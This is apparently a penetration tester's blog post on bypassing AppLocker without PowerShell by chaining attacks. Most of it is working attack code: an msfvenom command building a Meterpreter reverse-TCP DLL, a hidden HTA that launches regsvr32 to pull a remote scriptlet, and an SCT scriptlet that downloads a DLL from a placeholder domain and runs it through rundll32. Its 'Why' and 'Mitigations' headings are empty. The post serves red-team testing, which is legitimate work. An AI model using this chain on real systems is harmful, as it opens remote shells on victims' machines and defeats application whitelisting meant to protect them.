Elliot Speck Disk Space Invader

Chaining to Bypass AppLocker Without PowerShell

One of the services we provide at work is a “human factor penetration test”, or a social engineering engagement. We position ourselves as an attacker and treat the engagement as a completely red-team exercise to attempt to gain access to the corporate environment without being provided any knowledge of the inner workings of it. Generally speaking, environments either do not have AppLocker or any form of application whitelisting enabled, and/or have PowerShell enabled for use by all users. Recently, I encountered an environment where both of these were false. Luckily (well, for an attacker), I found it was possible to chain a number of previous attacks together in order to bypass both in one fell swoop.

Generate Payload:

msfvenom -p windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST=111.111.111.111 LPORT=443 -a x86 -f dll -o out.dll

Your .HTA file:

<html>
	<head>
		<script language="VBScript">
			window.moveTo -4000, -4000
			Set objShell = CreateObject("Wscript.Shell")
			objShell.Run("regsvr32 /u /n /s /i:https://your-domain.com/sct.sct scrobj.dll")
			window.close()
		</script>
	</head>
</html>

Your .SCT file:

<?XML version="1.0"?>
<scriptlet>
	<registration progid="ProgramID" classid="{10001111-0000-0000-0000-0000FEEDACDC}">
		<script language="VBScript">
			<![CDATA[
				Set FSO = CreateObject("Scripting.FileSystemObject")
				Set TMPDir = FSO.GetSpecialFolder(2)

				DLLDir = TMPDir & "\" & FSO.GetTempName()
				FSO.CreateFolder(DLLDir)
				OutFile = DLLDir & "\" & "MSFDLL.dll"

				Dim XMLHTTP
				Dim BinaryStream

				Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
				Set ByteStream = CreateObject("ADODB.Stream")

				XMLHTTP.Open "GET", "https://your-domain.com/path/to/your/dll.dll", False
				XMLHTTP.Send

				With ByteStream
				    .Type = 1
				    .Open
				    .Write XMLHTTP.ResponseBody
				    .SaveToFile OutFile
				End With

				Set WSS = CreateObject("Wscript.Shell")
				WSS.Run "C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL " & OutFile, 0, true
			]]>
		</script>
	</registration>
</scriptlet>

However, some antivirii detect this, so let’s go one stage deeper and add some mitigations to their mitigations, no?

– BASE64 ENCODING EXAMPLE

Why:

Mitigations:

Neat, huh? Having this “just work” would be - obviously - irresponsible. While you could copy and paste this code, edit the template a touch, and push it to a server and have it work, modern antivirus will detect the HTA file as being malware. It’s an exercise for the reader as to how to mitigate this.